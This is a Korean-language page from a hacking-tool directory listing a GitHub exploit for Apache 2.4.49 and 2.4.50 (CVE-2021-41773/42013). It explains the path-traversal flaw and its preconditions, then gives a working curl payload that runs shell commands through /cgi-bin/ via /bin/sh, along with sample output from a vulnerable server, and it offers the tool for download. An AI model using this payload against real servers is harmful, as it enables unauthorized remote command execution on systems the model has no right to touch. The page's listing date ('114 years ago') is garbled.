Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-41773 — Apache 서버용 원격 코드 실행(RCE) 익스플로잇. 영향받는 버전: Apache 2.4.49, Apache 2.4.50 | Kitploit
도구/GitHubGitHub/mr-exo/cve-2021-41773
ReconnaissancePayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubmr-exo/cve-2021-41773

CVE-2021-41773

Apache 서버용 원격 코드 실행(RCE) 익스플로잇. 영향받는 버전: Apache 2.4.49, Apache 2.4.50

저장소 보기
114년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Apache 2.4.49(CVE-2021-41773) 및 2.4.50(CVE-2021-42013) 모두에 대한 RCE 익스플로잇:

제 생각에는 이 RCE에 취약한 것은 '특별한' 설정뿐입니다.
당신이 본 '임의 파일 읽기' 익스플로잇도 마찬가지입니다.

두 CVE는 실제로 거의 동일한 경로 탐색 취약점입니다(두 번째 것은 첫 번째 것에 대한 불완전한 수정입니다).
경로 탐색은 매핑된 URI(예: Apache 지시문 "Alias" 또는 "ScriptAlias"를 통해)에서만 작동합니다. DocumentRoot만으로는 충분하지 않습니다.

"/cgi-bin/"는 기본적으로 매핑되며(ScriptAlias), 그래서 경로 탐색 문자열 앞에 사용되는 것입니다.
또한 ScriptAlias는 주어진 디렉터리의 모든 내용을(Apache의 경우) 파일 확장자와 무관하게 Exec로 표시합니다.

요구 사항:

1/ mod_cgi 활성화(기본값은 아니지만 쉬움)
2/ 대상 바이너리는 +x여야 함(/bin/sh의 기본값)
3/ /bin 또는 /에 대한 Apache 권한이 부여되어야 함(기본값이 아니며 어렵고 비현실적)\

서버가 취약한지 확인:

curl 'http://IPADDR/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'

취약한 서버의 응답:

uid=1(daemon) gid=1(daemon) groups=1(daemon)

도구 다운로드